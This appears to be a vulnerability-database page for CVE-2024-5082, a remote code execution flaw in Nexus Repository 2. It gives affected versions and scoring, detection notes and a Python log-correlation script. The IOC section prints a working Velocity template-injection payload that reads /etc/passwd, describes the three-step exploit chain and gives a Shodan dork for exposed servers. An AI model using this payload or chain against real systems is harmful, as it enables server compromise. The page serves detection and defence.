CVE-2024-5082
Published 2024-11-14
CVE-2024-5082: A Remote Code Execution vulnerability has been discovered in Sonatype Nexus Repository 2. This issue affects Nexus Repository 2 OSS/Pro versions up to and…
Priority P277 · high · 7.1 · CVSS 4.0
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 1.86% (76.6th percentile)
A Remote Code Execution vulnerability has been discovered in Sonatype Nexus Repository 2.
This issue affects Nexus Repository 2 OSS/Pro versions up to and including 2.15.1.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sonatype | nexus_repository | 2.0.0 – 2.15.1 | — |
Detection & IOCs (extracted from sources)
url: PUT /nexus/service/local/repositories/releases/content/com/sbt/ignite/ignite-bom/maven-metadata.xml
url: PUT /nexus/service/local/repositories/releases/content//.nexus/attributes/com/sbt/ignite/ignite-bom/maven-metadata.xml
url: GET /nexus/service/local/repositories/releases/content/com/sbt/ignite/ignite-bom/maven-metadata.xml
command: #set($engine="") #set($run=$engine.getClass().forName("java.lang.Runtime")) #set($runtime=$run.getRuntime()) #set($proc=$runtime.exec("cat /etc/passwd")) #set($null=$proc.waitFor()) #set($istr=$proc.getInputStream()) #set($chr=$engine.getClass().forName("java.lang.Character")) #set($output="") #set($string=$engine.getClass().forName("java.lang.String")) #foreach($i in [1..$istr.available()]) #set($output=$output.concat($string.valueOf($chr.toChars($istr.read())))) #end $output
- Exploit is a 3-step chain: (1) HTTP PUT of a Velocity-templated payload to a Maven metadata path, (2) HTTP PUT to the hidden /.nexus/attributes/ path setting contentGenerator to 'velocity', (3) HTTP GET to trigger server-side template rendering and retrieve RCE output.
- Step 1 PUT must return HTTP 201 for the exploit chain to proceed; monitor for unexpected 201 responses to PUT requests on Nexus Maven metadata paths.
- Step 2 sets the contentGenerator attribute to 'velocity' via a PUT to the /.nexus/attributes/ path — alert on PUT requests containing this path segment combined with the 'velocity' content generator value.
- The Velocity SSTI payload uses java.lang.Runtime.exec() via reflection; detect Velocity template syntax (#set, #foreach, getClass().forName) in HTTP request bodies to Nexus endpoints.
- Shodan dork for exposed Nexus Repository 2 instances: html:"Nexus Repository"
- Successful exploitation returns /etc/passwd content (matching root:.*:0:0:) in the response body with Content-Type text/plain from the GET request.
- The exploit requires valid credentials (Basic Auth) to authenticate to the Nexus Repository 2 instance; unauthenticated exploitation is not demonstrated in the template.
- Affected versions are Nexus Repository 2 OSS/Pro up to and including 2.15.1 only; Nexus Repository 3 is a separate product and not affected by this CVE.
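
The three-step sequence in the notes above can be correlated from access logs. The following is an added example, not part of the original page or the Nuclei template: it assumes an NCSA-style access log (client, ident, user, timestamp, request line, status, size), and the sample lines, addresses, and function names are constructed for illustration. Request bodies do not appear in access logs, so the Velocity-syntax check still needs a proxy or WAF that inspects bodies.

```python
import re
from collections import defaultdict

# Constructed access-log lines (NCSA-style); addresses, users and paths are sample values.
SAMPLE_LOG = """\
198.51.100.7 - deploy [14/Nov/2024:10:00:01 +0000] "PUT /nexus/service/local/repositories/releases/content/com/example/app/maven-metadata.xml HTTP/1.1" 201 0
198.51.100.7 - deploy [14/Nov/2024:10:00:02 +0000] "PUT /nexus/service/local/repositories/releases/content//.nexus/attributes/com/example/app/maven-metadata.xml HTTP/1.1" 201 0
198.51.100.7 - deploy [14/Nov/2024:10:00:03 +0000] "GET /nexus/service/local/repositories/releases/content/com/example/app/maven-metadata.xml HTTP/1.1" 200 1843
203.0.113.9 - ci [14/Nov/2024:10:05:00 +0000] "PUT /nexus/service/local/repositories/releases/content/org/demo/lib/1.0/lib-1.0.jar HTTP/1.1" 201 0
203.0.113.9 - ci [14/Nov/2024:10:05:04 +0000] "GET /nexus/service/local/repositories/releases/content/org/demo/lib/1.0/lib-1.0.jar HTTP/1.1" 200 5120
"""

LINE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(PUT|GET) (\S+) HTTP/[\d.]+" (\d{3}) ')
CONTENT = re.compile(r'^/nexus/service/local/repositories/([^/]+)/content/(.+)$')
ATTR_PREFIX = ".nexus/attributes/"

def find_chains(log_text):
    """Return (client, user, repo, artifact) tuples that completed all three steps in order."""
    stage = defaultdict(int)   # (client, user, repo, artifact) -> highest step seen
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, user, method, url, status = m.groups()
        # Collapse repeated slashes so "content//.nexus" and "content/.nexus" match alike.
        c = CONTENT.match(re.sub(r"/{2,}", "/", url.split("?", 1)[0]))
        if not c:
            continue
        repo, path = c.groups()
        is_attr = path.startswith(ATTR_PREFIX)
        artifact = path[len(ATTR_PREFIX):] if is_attr else path
        key = (client, user, repo, artifact)
        ok = status.startswith("2")
        if method == "PUT" and not is_attr and status == "201":
            stage[key] = 1                      # step 1: content upload accepted
        elif method == "PUT" and is_attr and ok and stage[key] >= 1:
            stage[key] = 2                      # step 2: attribute file overwritten
        elif method == "GET" and not is_attr and ok and stage[key] == 2:
            hits.append(key)                    # step 3: same path fetched back
            stage[key] = 0
    return hits

def lone_attribute_writes(log_text):
    """Any PUT under /.nexus/attributes/ is worth an alert on its own."""
    return [l for l in log_text.splitlines()
            if (m := LINE.match(l)) and m.group(3) == "PUT"
            and "/.nexus/attributes/" in re.sub(r"/{2,}", "/", m.group(4))]
```

The ordinary jar deploy by the second client is not flagged, because it never writes under the attributes path.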
CVSS provenance
nvd · v4.0 · 7.1 HIGH · CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck · 7.1 HIGH
GHSA
GHSA-6q5h-c4ff-f2vc: A Remote Code Execution vulnerability has been discovered in Sonatype Nexus Repository 2
ghsa_unreviewed·2024-11-14
CVE-2024-5082 [HIGH] CWE-94 GHSA-6q5h-c4ff-f2vc: A Remote Code Execution vulnerability has been discovered in Sonatype Nexus Repository 2
VulnCheck
sonatype nexus_repository_manager Improper Control of Generation of Code ('Code Injection')
vulncheck·2024·CVSS 7.1
CVE-2024-5082 [HIGH] sonatype nexus_repository_manager Improper Control of Generation of Code ('Code Injection')
Affected: sonatype nexus_repository_manager
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2024-5082
No detection rules found.
Nuclei
Nexus Repository 2 - Remote Code Execution
nuclei·CVSS 7.1
CVE-2024-5082 [HIGH] Nexus Repository 2 - Remote Code Execution
Template:
```yaml
id: CVE-2024-5082
info:
  name: Nexus Repository 2 - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    A Remote Code Execution vulnerability has been discovered in Sonatype Nexus Repository 2.This issue affects Nexus Repository 2 OSS/Pro versions up to and including 2.15.1.
  impact: |
    Attackers can exploit vulnerabilities to compromise the system.
  remediation: |
    Update to the latest patched version addressing CVE-2024-5082.
  reference:
    - https://github.blog/security/vulnerability-research/attacks-on-maven-proxy-repositories/
    -
```